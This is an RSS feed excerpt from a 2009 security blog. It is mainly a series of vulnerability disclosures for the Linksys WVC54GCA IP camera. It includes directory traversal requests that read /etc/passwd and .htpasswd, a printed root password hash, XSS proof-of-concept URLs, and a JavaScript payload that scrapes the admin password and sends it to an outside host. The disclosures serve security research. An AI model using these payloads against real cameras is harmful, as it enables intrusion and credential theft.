5000 / 500 = 10 # months worth of work</code></pre> <p>Heck, I can even put this bill on my credit card and pay as little as $50 a month. The chances that I will sell an exploit for $5K in the next 10 months are pretty high. $5K is only if I go with a legitimate company. I can probably make 6 times more by selling it to a dodgy 3rd-party. The only thing I need to worry about is the risk.</p> <h3>Some Final Words</h3> <p>Finally, I know that a lot of people are into the security business because of all the romanticism and the myths surrounding the <q>hacker</q> figure. Things look different once you become the hacker and your day job and lifestyle are surrounded by hacking and breaking into systems of any sort. There is nothing romantic about it.</p> <p><em>So, don&#8217;t get into trouble for the wrong reasons. If you are young and you need advice what to do with your career, contact us or contact any one who has been into this industry long enough to give you a good and sensible advice. Just don&#8217;t jump onto the <q>No free bugs!</q> bandwagon.</em></p><p>---<br/>gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/gigs">information security gigs</a> part of the <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net">cutting-edge network</a>:</p><ul><li><a rel="nofollow" target="_blank" href="http://www.adsosimple.com/">No active items found!</a></li><li><a rel="nofollow" target="_blank" href="http://spreadsheets.google.com/viewform?formkey=cFFqa3VVa0FRWFdwN2hzMHVvaldaWWc6MA..">GNUCITIZEN Content Survey</a></li></ul><p>---<br/>recent posts from the gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/">cutting-edge network</a>:</p><p><a rel="nofollow" target="_blank" href="http://blog.websecurify.com/2009/07/websecurify-security-scanner-v01-sneak.html">Websecurify Security Scanner v0.1 Sneak Peek</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/MbrBV_cxDIg/">CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept</a><br/><a rel="nofollow" target="_blank" href="http://houseofhackers.org/2009/06/06/next-stage/">Next Stage</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/i5HZCjdXt3I/">Hacking Linksys IP Cameras (pt 5)</a><br/><a rel="nofollow" target="_blank" href="http://www.hakiri.org/blog/simple-and-obvious/">Simple and Obvious</a><br/></p><img src="http://feeds.feedburner.com/~r/gnucitizen/~4/rELeF2i51BY" height="1" width="1"/>]]></content:encoded>
      </item>
      <item>
         <title>Jeriko Group and Source Code Repository</title>
         <link>http://feedproxy.google.com/~r/gnucitizen/~3/TtNVvmtSyEM/</link>
         <description>With this post I would like to inform you that Jeriko moved in its own source code repository which you will be able to find here. There is also a discussion group here, if you feel like using it. The version inside the new code repository is very different from the version you&amp;#8217;ve seen before. [...]</description>
         <guid isPermaLink="false">https://www.gnucitizen.org/?p=3130</guid>
         <pubDate>Mon, 27 Apr 2009 23:50:39 -0700</pubDate>
         <content:encoded><![CDATA[<p>With this post I would like to inform you that Jeriko moved in its own source code repository which you will be able to find <a rel="nofollow" target="_blank" href="http://code.google.com/p/jeriko/">here</a>. There is also a discussion group <a rel="nofollow" target="_blank" href="http://groups.google.com/group/Jeriko">here</a>, if you feel like using it.</p> <div class="screen"><a rel="nofollow" target="_blank" href="http://www.flickr.com/photos/jannem/3312115991/"><img src="http://farm4.static.flickr.com/3616/3312115991_cc2a483d06.jpg?v=0" alt="Chocolate Tools"/></a></div> <p>The version inside the new code repository is very different from the version you&#8217;ve seen before. The main difference is that while the old version is basically a collection of scripts, the new version implements its own shell (wrapper around bash) which does the heavily lifting and also introduces some funky programming mechanisms. For example, now you can create jeriko scripts like this:</p> <pre><code>#/usr/bin/env jeriko
# do my jeriko commands here
foreach-input | add-targets
generate-scan-batch | run-in-parallel</code></pre> <p>This is perhaps the simplest possible script you can write but you see that the jeriko shell could turn into a quite powerful feature. The shell is also a good starting point for many penetration testing jobs as it does some environment checking and preconfigures some defaults for you. The other good news is that you don&#8217;t have to learn a new programming language. Your bash skills are good for jeriko too.</p> <p><em>Just keep in mind that jeriko is merely an experiment. However, I realize that it has already become quite useful for some people. So, if you enjoy playing with bash scripts, and you you feel adventurous, please join us and make this project happen.</em></p><p>---<br/>gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/gigs">information security gigs</a> part of the <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net">cutting-edge network</a>:</p><ul><li><a rel="nofollow" target="_blank" href="http://www.adsosimple.com/">No active items found!</a></li><li><a rel="nofollow" target="_blank" href="http://spreadsheets.google.com/viewform?formkey=cFFqa3VVa0FRWFdwN2hzMHVvaldaWWc6MA..">GNUCITIZEN Content Survey</a></li></ul><p>---<br/>recent posts from the gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/">cutting-edge network</a>:</p><p><a rel="nofollow" target="_blank" href="http://blog.websecurify.com/2009/07/websecurify-security-scanner-v01-sneak.html">Websecurify Security Scanner v0.1 Sneak Peek</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/MbrBV_cxDIg/">CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept</a><br/><a rel="nofollow" target="_blank" href="http://houseofhackers.org/2009/06/06/next-stage/">Next Stage</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/i5HZCjdXt3I/">Hacking Linksys IP Cameras (pt 5)</a><br/><a rel="nofollow" target="_blank" href="http://www.hakiri.org/blog/simple-and-obvious/">Simple and Obvious</a><br/></p><img src="http://feeds.feedburner.com/~r/gnucitizen/~4/TtNVvmtSyEM" height="1" width="1"/>]]></content:encoded>
      </item>
      <item>
         <title>Hacking Linksys IP Cameras (pt 4)</title>
         <link>http://feedproxy.google.com/~r/gnucitizen/~3/MLCS3DSstF8/</link>
         <description>This article is a continuation of the following GNUCITIZEN articles, which include an introduction to the topic and also some initial observations: Hacking Linksys IP Cameras (pt 1), Hacking Linksys IP Cameras (pt 2), Hacking Linksys IP Cameras (pt 3). There are two types of vulnerabilities I will be releasing today: disclosure of credentials in client-side source code and multiple XSS. [...]</description>
         <guid isPermaLink="false">https://www.gnucitizen.org/?p=3070</guid>
         <pubDate>Fri, 24 Apr 2009 20:28:38 -0700</pubDate>
         <content:encoded><![CDATA[<p><em>This article is a continuation of the following GNUCITIZEN articles, which include an introduction to the topic and also some initial observations: <q><a rel="nofollow" target="_blank" href="http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-1/">Hacking Linksys IP Cameras (pt 1)</a></q>, <q><a rel="nofollow" target="_blank" href="http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-2/">Hacking Linksys IP Cameras (pt 2)</a></q>, <q><a rel="nofollow" target="_blank" href="http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-3/">Hacking Linksys IP Cameras (pt 3)</a></q>.</em></p> <p>There are two types of vulnerabilities I will be releasing today: disclosure of credentials in client-side source code and multiple XSS.</p> <h3>Disclosure of Credentials in Client-side Source Code</h3> <p>As a consumer of embedded products, I find highly frustrating to see how many devices&#8217; web interfaces return passwords back to the browser within HTML source code. I&#8217;ve also seen similar problems in some corporate appliances, but is not such as common problem within the enterprise realm.</p> <div class="screen"><a rel="nofollow" target="_blank" href="http://www.flickr.com/photos/stephenjjohnson/2899060572/"><img src="http://farm4.static.flickr.com/3134/2899060572_2f927ef7a0.jpg?v=0" title="CCTV, London 2008"/></a></div> <p>Visiting the &#8220;change admin password&#8221; page:</p> <pre><code>/adm/file.cgi?next_file=pass_wd.htm</code></pre> <p>Causes the current admin password to be returned (just view the source code with your browser):</p> <pre><code>&lt;input type="password" size="8" maxlength="64" name="admpw" value="<strong>C4mP4ssw0rd</strong>" onKeyDown="chkPsize(this.value.length,64,msg_bigpw)"&gt;</pre></code> <p>Visiting the "Wireless Security Page":</p> <pre><code>/adm/file.cgi?next_file=Wsecurity.htm</code></pre> <p>Causes the Wi-Fi WEP/WPA/WPA2 encryption key to be returned to the browser:</p> <pre><code>&lt;input type="text" name="psk" size="24" maxlength="63" value="<strong>mywirelesskey</strong>"&gt;</code></pre> <p>Obviously this is bad news, as it means that every time the aforementioned pages are visited, credentials travel the clear (the WVC54GCA IP camera doesn't have SSL/TLS support).</p> <p>Now, I know there are people out there who might find these types of issues <em>not</em> worth fixing. The following is the thinking behind their reasoning.</p> <p>In the case of the admin password disclosure, some people would argue that this issue wouldn't make a difference security-wise, since the camera uses <a rel="nofollow" target="_blank" href="http://en.wikipedia.org/wiki/Basic_access_authentication">basic authentication</a> which transmits credentials in the clear (base64 encoding) anyway.</p> <p>In the case of the wireless encryption key disclosure, some individuals point out that if you can sniff the Wi-Fi encryption key, it means that either 1) you're already part of the wireless network which means you must already know the key, or 2) you are part of the network via an ethernet connection which means that you don't need the wireless key at all.</p> <p>So why fix these issues then? Well, think of client-side attacks for instance. If you keep reading I'll show you how you can (for instance) use XSS to steal the admin password from the aforementioned page. If the admin password wasn't returned by the web interface, this attack would not be possible, despite basic authentication being used by the camera.</p> <h3>Several XSS bugs</h3> <p>Yes, XSS is the roach of the Internet, it's everywhere and we can't seem to be able to get rid of it! Of course, Linksys IP cameras are no exception. Finding XSS vulns requires virtually no skills (unless you are trying to bypass a strict filter logic). Also, hunting for XSS vulns can be kind of boring. As pdp usually says, "it's not finding XSS bugs which is interesting, but what you can do with it". I couldn't agree more.</p> <p>Boring PoCs:</p>
<pre><code>/main.cgi?next_file=%3Cimg%20src%3dx%20onerror%3dalert(1)%3E</code></pre>
<pre><code>/img/main.cgi?next_file=%3Cimg%20src%3dx%20onerror%3dalert(1)%3E</code></pre>
<pre><code>/adm/file.cgi?next_file=%3Cscript%3Ealert(1)%3C/script%3E</code></pre>
<pre><code>/adm/file.cgi?todo=xss&#038;this_file=%3cscript%3ealert(1)%3c/script%3e</pre></code> <p>XSS bug #1 works regardless of the authentication state of the victim user. The rest do require the victim user to be logged-in for the injected JS to run within the context of the camera's domain sandbox.</p> <p>As you can see in the first two XSS vulns, we use <code>img</code> tags, rather then <code>script</code> tags, due to closing <code>script</code> tags being filtered. Once again, the developers have chosen to perform filtering against some parameters, albeit poor filtering.</p> <h4>Admin Password theft XSS PoC</h4> <p>The following is the PoC exploit which steals the admin user's password.</p> <pre><code>// <strong>evil.js</strong> : malicious JS file, typically located on attacker's site
// payload description: steals Linksys WVC54GCA admin password via XSS
// tested on FF3 and IE7
// based on code from developer.apple.com
function loadXMLDoc(url) { req = false; // branch for native XMLHttpRequest object if(window.XMLHttpRequest &amp;&amp; !(window.ActiveXObject)) { try { req = new XMLHttpRequest(); } catch(e) { req = false; } } // branch for IE/Windows ActiveX version else if(window.ActiveXObject) { try { req = new ActiveXObject("Msxml2.XMLHTTP"); } catch(e) { try { req = new ActiveXObject("Microsoft.XMLHTTP"); } catch(e) { req = false; } } } if(req) { req.onreadystatechange = processReqChange; req.open("GET", url, true); req.send(""); }
}
// end of loadXMLDoc(url) function processReqChange() { // only if req shows "loaded" if (req.readyState == 4) { // only if "OK" if (req.status == 200) { // dirty credentials-scraping code var bits=req.responseText.split(/&#92;"/); var gems=""; for (i=0;i&lt;bits.length;++i) { if(bits[i]=="adm" &amp;&amp; bits[i+1]==" value=") { gems+="login="; gems+=bits[i+2]; } if(bits[i]=="admpw" &amp;&amp; bits[i+1]==" value=") { gems+=&apos;&amp;password=&apos;; gems+=bits[i+2]; } } alert(gems); // this line is for demo purposes only and would be removed in a real attack c=new Image(); c.src=&apos;http://google.com/x.php?&apos;+gems; // URL should point to data-theft script on attacker&apos;s site } }
} var url="/adm/file.cgi?next_file=pass_wd.htm";
loadXMLDoc(url);</code></pre> <pre><code>http://192.168.1.115/adm/file.cgi?next_file=%3cscript%20src=http://evil.foo/<strong>evil.js</strong>%3e%3c/script%3e</code></pre> <p>If you capture the traffic while testing the exploit against yourself you will see the admin login and password being sent to google.com:</p> <div class="screen"><img src="http://www.gnucitizen.org/static/blog/2009/04/screenshot-eth1-capturing-wireshark1.png" alt="Screenshot eth1 Capturing Wireshark 1" title="Screenshot eth1 Capturing Wireshark 1" width="505" height="189" class="alignnone size-full wp-image-3100"/></div> <h4>Attack Requirements</h4> <p>In order for this exploit to work, the camera admin user must be logged in when the attack occurs. This means that a bit of social engineering is required. For instance, the attacker could setup a forum to "help" users of the WVC54GCA camera by providing tips, FAQs, etc. If the attacker is serious he could use <a rel="nofollow" target="_blank" href="http://www.timesonline.co.uk/tol/driving/article754974.ece">black hat SEO</a> and ad campaigns such as Google AdWords to attract Linksys camera users to visit the site containing the malicious XSS URLs. You get the idea!</p> <h3>Testing Info</h3> <p>All Disclosure of Credentials and XSS vulnerabilities successfully tested on:</p>
<ul>
<li>WVC54GCA</li>
<li>Firmware V1.00R22 and V1.00R24 (latest available as on 23rd April 2009)</li>
</ul><p>---<br/>gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/gigs">information security gigs</a> part of the <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net">cutting-edge network</a>:</p><ul><li><a rel="nofollow" target="_blank" href="http://www.adsosimple.com/">No active items found!</a></li><li><a rel="nofollow" target="_blank" href="http://spreadsheets.google.com/viewform?formkey=cFFqa3VVa0FRWFdwN2hzMHVvaldaWWc6MA..">GNUCITIZEN Content Survey</a></li></ul><p>---<br/>recent posts from the gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/">cutting-edge network</a>:</p><p><a rel="nofollow" target="_blank" href="http://blog.websecurify.com/2009/07/websecurify-security-scanner-v01-sneak.html">Websecurify Security Scanner v0.1 Sneak Peek</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/MbrBV_cxDIg/">CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept</a><br/><a rel="nofollow" target="_blank" href="http://houseofhackers.org/2009/06/06/next-stage/">Next Stage</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/i5HZCjdXt3I/">Hacking Linksys IP Cameras (pt 5)</a><br/><a rel="nofollow" target="_blank" href="http://www.hakiri.org/blog/simple-and-obvious/">Simple and Obvious</a><br/></p><img src="http://feeds.feedburner.com/~r/gnucitizen/~4/MLCS3DSstF8" height="1" width="1"/>]]></content:encoded>
      </item>
      <item>
         <title>Hacking Linksys IP Cameras (pt 3)</title>
         <link>http://feedproxy.google.com/~r/gnucitizen/~3/naGW6csyQ94/</link>
         <description>This article is a continuation of the following GNUCITIZEN articles, which include an introduction to the topic and also some initial observations: Hacking Linksys IP Cameras (pt 1), Hacking Linksys IP Cameras (pt 2). Unlike the previous two vulnerabilities I released, the vulnerabilities I&amp;#8217;m releasing in this post are perhaps not so useful to break into the device as you need access to the admin account to exploit them. [...]</description>
         <guid isPermaLink="false">https://www.gnucitizen.org/?p=3019</guid>
         <pubDate>Wed, 22 Apr 2009 17:52:28 -0700</pubDate>
         <content:encoded><![CDATA[<p><em>This article is a continuation of the following GNUCITIZEN articles, which include an introduction to the topic and also some initial observations: <q><a rel="nofollow" target="_blank" href="http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-1/">Hacking Linksys IP Cameras (pt 1)</a></q>, <q><a rel="nofollow" target="_blank" href="http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-2/">Hacking Linksys IP Cameras (pt 2)</a></q>.</em></p> <p>Unlike the <a rel="nofollow" target="_blank" href="http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-1/">previous</a> <a rel="nofollow" target="_blank" href="http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-2/">two</a> vulnerabilities I released, the vulnerabilities I&#8217;m releasing in this post are perhaps not so useful to break into the device as you need access to the admin account to exploit them. Nevertheless, these vulnerabilities might be useful for users who want to hack their Linksys IP cameras for modding purposes, rather than being used by an attacker aiming to crack into someone else&#8217;s camera.</p> <h3>Two directory traversal vulnerabilities</h3> <p>Today, instead of releasing just one vulnerability I&#8217;ll be releasing two! These two vulnerabilities have helped me understand more about how the WVC54GCA wireless camera internals and I&#8217;m hoping they will also work on other Linksys camera models. Please let me know if you successfully test them on other models too!</p> <div class="screen"><a rel="nofollow" target="_blank" href="http://www.flickr.com/photos/spunkinator/1301627671/"><img src="http://farm2.static.flickr.com/1043/1301627671_de230961cd.jpg?v=1190074318" title="CCTV In Operation"/></a></div> <p>Both vulnerabilities are of type <strong>directory traversal</strong>, aka <strong>arbitrary file retrieval</strong>, and they both affect the same CGI program: <code>/adm/file.cgi</code>. <em>Please note that these vulnerabilities are different to <a rel="nofollow" target="_blank" href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2507">CVE-2004-2507</a>/<a rel="nofollow" target="_blank" href="http://www.securityfocus.com/bid/10476/exploit">BID 10476</a> which affected <code>/main.cgi</code> instead.</em></p> <h4>1st directory traversal hole</h4> <p>It seems that the <code>next_file</code> parameter is not filtered enough when submitted to <code>/adm/file.cgi</code>, so that either of the following requests will return the content of any file whose location is known (<code>/etc/passwd</code> in this case):</p> <pre><code>/adm/file.cgi?next_file=%2fetc%2fpasswd</code></pre>
<pre><code>/adm/file.cgi?next_file=%2fetc/passwd</code></pre>
<pre><code>/adm/file.cgi?next_file=%2e.%2f%2e.%2f%2e.%2f%2e.%2fetc%2fpasswd</code></pre> <h4>2nd directory traversal hole</h4> <p>In the case of the second directory traversal hole, the vulnerable parameter (<code>this_file</code>) is not filtered at all whatsoever. So hex-encoding special symbols is <em>not</em> required:</p> <pre><code>/adm/file.cgi?todo=pwnage&#038;this_file=/etc/passwd</code></pre> <p>The following is the content of the Linux <code>passwd</code> file containing the encrypted root password. Remember that the WVC54GCA comes with BusyBox Linux by default which you can confirm by opening <code>bin/busybox</code> with any of the vulnerabilities previously discussed. I&#8217;m curious to know if the <code>passwd</code> file contains the same password on all cameras of the same model, or even if Linksys is also using the same password on other models:</p> <pre><code>root:9szj4G6pgOGeA:0:0:root:/root:/bin/sh</code></pre> <p>Notice that when exploiting the first vulnerability, we need to convert forward slashes to <code>%2f</code> which is its hex-encoding equivalent. This is because the developer (poorly) attempted to filter directory traversal sequences when data is submitted via the <code>next_file</code> parameter. In the third example, we also partially hex-encode <code>../</code> sequences in order to avoid being blocked by the script which results in a forbidden error.</p> <p>Needless to say, if the root password is not too strong you should be able to crack it using <a rel="nofollow" target="_blank" href="http://www.openwall.com/john/">john</a> or you favorite password cracking tool. I loaded passwd with john for a few hours on an old laptop and nothing was found, so I&#8217;m guessing the root password is not extremely weak. If you model comes with the telnet daemon running by default, cracking that password should give you root shell access.</p> <p>Unfortunately, as I mentioned in the <a rel="nofollow" target="_blank" href="http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-1/">first post</a> of these series, the WVC54GCA camera comes with a telnet daemon included, but it&#8217;s off by default. I haven&#8217;t managed to enable the telnet daemon and get a remote root shell yet although I suspect it might be possible by <a rel="nofollow" target="_blank" href="http://brooknet.no-ip.com/~lex/public/WVC54G/">modifying</a> the bin firmware image and uploading it again.</p> <h4>What can we do with these vulnerabilities?</h4> <p>Well, I tried finding files that contain interesting information that helps you understand the camera better. The following are some examples:</p> <ul>
<li><code>/etc/passwd</code> : traditional-DES-format password file with no salt</li>
<li><code>/usr/local/www/img/.htpasswd</code> : HTTP credentials stored in cleartext</li>
<li><code>/usr/local/www/adm/.htpasswd</code> : contains same data as previous file</li>
<li><code>/etc/system.conf</code> : all camera settings stored in cleartext including admin password, wifi encryption key, etc &#8230;</li>
<li><code>/usr/local/bin/thttpd.conf</code> : web server config file confirming the daemon runs as root, which is the only system account present anyway</li>
<li><code>/etc/init.d/rcS</code> : here we see the line that starts the telnet daemon (<code>/usr/sbin/telnetd</code>) commented out</li>
<li><code>/etc/def_sys.conf</code> : camera&#8217;s default settings</li>
<li><code>/etc/system.conf</code> : camera&#8217;s current settings</li>
<li><code>/var/nc.log</code> : network connections logs</li>
<li><code>/etc/group</code></li>
<li><code>/etc/inittab</code></li>
<li><code>/proc/cpuinfo</code> : processor details</li>
<li><code>/proc/meminfo</code></li>
<li><code>/proc/version</code> : OS details</li>
<li><code>/proc/uptime</code></li>
</ul> <p>Finding a file upload vulnerability should allow us to overwrite the <code>/etc/init.d/rcS</code> file and eventually manage to start the telnet server after reboot. By overwriting the <code>/etc/passwd</code> file with our own we should be able to add our own root password. Unfortunately, I haven&#8217;t discovered any vulnerability that would allow me to upload files to arbirary locations. If you do discover one, please let me know. I&#8217;d love to hear the details.</p> <h3>Testing Info</h3> <p>Directory traversal vuln #1 successfully tested on:</p>
<p><ul>
<li>WVC54GCA</li>
<li>Firmware V1.00R22 and V1.00R24 (latest available as on 23rd April 2009)</li>
</ul> <p>Directory traversal vuln #2 successfully tested on:</p>
<p><ul>
<li>WVC54GCA</li>
<li>V1.00R24 (latest available as on 23rd April 2009)</li>
</ul>
<p>Although I never tested the second traversal vulnerability on Firmware V1.00R22, I definitely suspect it will work on this previous firmware version as well.</p>
<p><em>Please note that the aforementioned vulnerabilities are different to <a rel="nofollow" target="_blank" href="http://www.securityfocus.com/bid/10476/exploit">BID 10476</a> which affected the <code>/main.cgi</code> program rather than <code>/adm/file.cgi</code>.</em></p><p>---<br/>gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/gigs">information security gigs</a> part of the <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net">cutting-edge network</a>:</p><ul><li><a rel="nofollow" target="_blank" href="http://www.adsosimple.com/">No active items found!</a></li><li><a rel="nofollow" target="_blank" href="http://spreadsheets.google.com/viewform?formkey=cFFqa3VVa0FRWFdwN2hzMHVvaldaWWc6MA..">GNUCITIZEN Content Survey</a></li></ul><p>---<br/>recent posts from the gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/">cutting-edge network</a>:</p><p><a rel="nofollow" target="_blank" href="http://blog.websecurify.com/2009/07/websecurify-security-scanner-v01-sneak.html">Websecurify Security Scanner v0.1 Sneak Peek</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/MbrBV_cxDIg/">CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept</a><br/><a rel="nofollow" target="_blank" href="http://houseofhackers.org/2009/06/06/next-stage/">Next Stage</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/i5HZCjdXt3I/">Hacking Linksys IP Cameras (pt 5)</a><br/><a rel="nofollow" target="_blank" href="http://www.hakiri.org/blog/simple-and-obvious/">Simple and Obvious</a><br/></p><img src="http://feeds.feedburner.com/~r/gnucitizen/~4/naGW6csyQ94" height="1" width="1"/>]]></content:encoded>
      </item>
      <item>
         <title>Google Me</title>
         <link>http://blog.blogsecurify.com/2009/04/google-me.html</link>
         <description>Google &lt;a rel="nofollow" target="_blank" href="http://googleblog.blogspot.com/2009/04/search-for-me-on-google.html"&gt;revealed&lt;/a&gt; that the company will serve Personal Profiles via the search results. Probably not a big deal, but this yet another example of how far Web2.0 technologies will go. It will be interesting to see how everything will span out. The good thing is that your profile is not available to the public by default. You need to opt in.&lt;br /&gt;&lt;br /&gt;I will most definitely be watching...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/443511708867239838-5916562189915269081?l=blog.blogsecurify.com'/&gt;&lt;/div&gt;</description>
         <author>noreply@blogger.com (pdp)</author>
         <guid isPermaLink="false">tag:blogger.com,1999:blog-443511708867239838.post-5916562189915269081</guid>
         <pubDate>Wed, 22 Apr 2009 06:48:00 -0700</pubDate>
      </item>
      <item>
         <title>Hacking Linksys IP Cameras (pt 2)</title>
         <link>http://feedproxy.google.com/~r/gnucitizen/~3/PJt6KPz8WQ0/</link>
         <description>This article is a continuation of the following GNUCITIZEN article, which includes an introduction to the topic and also some initial observations: Hacking Linksys IP Cameras (pt 1). Privilege escalation via arbitrary file retrieval The second vulnerability I&amp;#8217;ll be releasing is an arbitrary(ish) file retrieval vulnerability. It&amp;#8217;s not fully arbitrary because you can only retrieve the contents of files located within the same directory where the vulnerable CGI program is located. [...]</description>
         <guid isPermaLink="false">https://www.gnucitizen.org/?p=2978</guid>
         <pubDate>Mon, 20 Apr 2009 15:27:14 -0700</pubDate>
         <content:encoded><![CDATA[<p><em>This article is a continuation of the following GNUCITIZEN article, which includes an introduction to the topic and also some initial observations: <q><a rel="nofollow" target="_blank" href="http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-1/">Hacking Linksys IP Cameras (pt 1)</a></q>.</em></p> <h3>Privilege escalation via arbitrary file retrieval</h3> <p>The second vulnerability I&#8217;ll be releasing is an arbitrary(ish) file retrieval vulnerability. It&#8217;s not fully arbitrary because you can only retrieve the contents of files located within the same directory where the vulnerable CGI program is located. However, this is enough to allow a neat privilege escalation vector where a restricted user that only has permissions to view the video stream, can gain access to the <code>admin</code> account password.</p> <div class="screen"><a rel="nofollow" target="_blank" href="http://www.flickr.com/photos/adselwood/2724733530/"><img src="http://farm4.static.flickr.com/3095/2724733530_1d7c6b12b0.jpg?v=0" title="Fire Surveillance HDR"/></a></div> <p>The problem lies within the <code>next_file</code> parameter which is submitted to the <code>main.cgi</code> program. Although <code>main.cgi</code> <em>does</em> filter characters typically used in directory traversal sequences such as dots (<code>.</code>) and forward slashes (<code>/</code>), it seems that the developer didn&#8217;t consider that retrieving the contents of files within the current directory could create a security hole. By simply retrieving the contents of <code>.htpasswd</code> a restricted user which only has permissions to access the video stream can access the credentials of the <code>admin</code> account and also the credentials of other restricted users (if applicable).</p> <p>The only restriction that needs to be bypassed, is dots (<code>.</code>) symbols being filtered. i.e.: the following will <em>not</em> work and will result in a forbidden error:</p> <pre><code>/img/main.cgi?next_file=.htpasswd</code></pre> <p>But replacing the dot (<code>.</code>) symbol with its hexadecimal equivalent:</p> <pre><code>/img/main.cgi?next_file=%2ehtpasswd</code></pre> <p>Will result in the contents of <code>.htpasswd</code> being returned. i.e.:</p> <pre><code>admin:adminpassw0rd user1:pass1 user2:pass2</code></pre> <p>Like most IP cameras, the Linksys WVC54GCA allows administrators to grant access to the video stream to selected users only (rather than anonymous users who don&#8217;t need to authenticate). In this case, the admin user can click on the <code>Users</code> menu and tick the <code>Only users in database</code> option (please see screenshot below). After this, all that is needed is to add a username/password pair for the account to grant video-viewing access to:</p> <div class="screen"><img src="http://www.gnucitizen.org/static/blog/2009/04/video_user_accounts.png" alt="Video User Accounts" title="Video User Accounts" width="489" height="227" class="alignnone size-full wp-image-2990"/></div> <p>Well, the feature discussed above can be rendered useless by exploiting the vulnerability I have described, since it allows restricted users to retrieve the admin password.</p> <h3>Testing Info</h3> <p>Successfully tested on:</p>
<p><ul>
<li>WVC54GCA</li>
<li>Firmware V1.00R22 and V1.00R24 (latest available as on 20th April 2009)</li>
</ul> <p><em>Please note that this vulnerability is different to <a rel="nofollow" target="_blank" href="http://www.securityfocus.com/bid/10476/exploit">BID 10476</a> which affected the <code>/main.cgi</code> program rather than <code>/img/main.cgi</code>.</em></p><p>---<br/>gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/gigs">information security gigs</a> part of the <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net">cutting-edge network</a>:</p><ul><li><a rel="nofollow" target="_blank" href="http://www.adsosimple.com/">No active items found!</a></li><li><a rel="nofollow" target="_blank" href="http://spreadsheets.google.com/viewform?formkey=cFFqa3VVa0FRWFdwN2hzMHVvaldaWWc6MA..">GNUCITIZEN Content Survey</a></li></ul><p>---<br/>recent posts from the gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/">cutting-edge network</a>:</p><p><a rel="nofollow" target="_blank" href="http://blog.websecurify.com/2009/07/websecurify-security-scanner-v01-sneak.html">Websecurify Security Scanner v0.1 Sneak Peek</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/MbrBV_cxDIg/">CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept</a><br/><a rel="nofollow" target="_blank" href="http://houseofhackers.org/2009/06/06/next-stage/">Next Stage</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/i5HZCjdXt3I/">Hacking Linksys IP Cameras (pt 5)</a><br/><a rel="nofollow" target="_blank" href="http://www.hakiri.org/blog/simple-and-obvious/">Simple and Obvious</a><br/></p><img src="http://feeds.feedburner.com/~r/gnucitizen/~4/PJt6KPz8WQ0" height="1" width="1"/>]]></content:encoded>
      </item>
      <item>
         <title>Hacking Linksys IP Cameras (pt 1)</title>
         <link>http://feedproxy.google.com/~r/gnucitizen/~3/L70Pxgeh0oI/</link>
         <description>During the easter break, I was playing with my my wireless Linksys IP camera which, although I bought several months ago, I hadn&amp;#8217;t taken my time to give the attention this beauty deserves until now! :) The model in particular is the WVC54GCA, which I would say is one of the most affordable Wi-Fi IP cameras out there (about GBP 80 in the UK), making it a great toy to tinker with. [...]</description>
         <guid isPermaLink="false">https://www.gnucitizen.org/?p=2899</guid>
         <pubDate>Mon, 20 Apr 2009 00:40:35 -0700</pubDate>
         <content:encoded><![CDATA[<p>During the easter break, I was playing with my my wireless Linksys IP camera which, although I bought several months ago, I hadn&#8217;t taken my time to give the attention this beauty deserves until now! :)</p> <p>The model in particular is the <a rel="nofollow" target="_blank" href="http://www.linksysbycisco.com/US/en/products/WVC54GCA">WVC54GCA</a>, which I would say is one of the most affordable Wi-Fi IP cameras out there (about GBP 80 in the UK), making it a great toy to tinker with.</p> <div class="screen"><a rel="nofollow" target="_blank" href="http://www.flickr.com/photos/joachim_s_mueller/747735445/"><img src="http://farm2.static.flickr.com/1008/747735445_40437249ec.jpg?v=0" title="Surveillance"/></a></div> <p>I found the camera to be quite good functionalities-wise, although I&#8217;ve experienced availability problems with it. It seems the camera freezes every once in a while. Well, this is true at least when you heavily customized its configuration which is what I&#8217;ve ultimately done after playing so much with it.</p> <p>I&#8217;ve loved playing with embedded devices for a 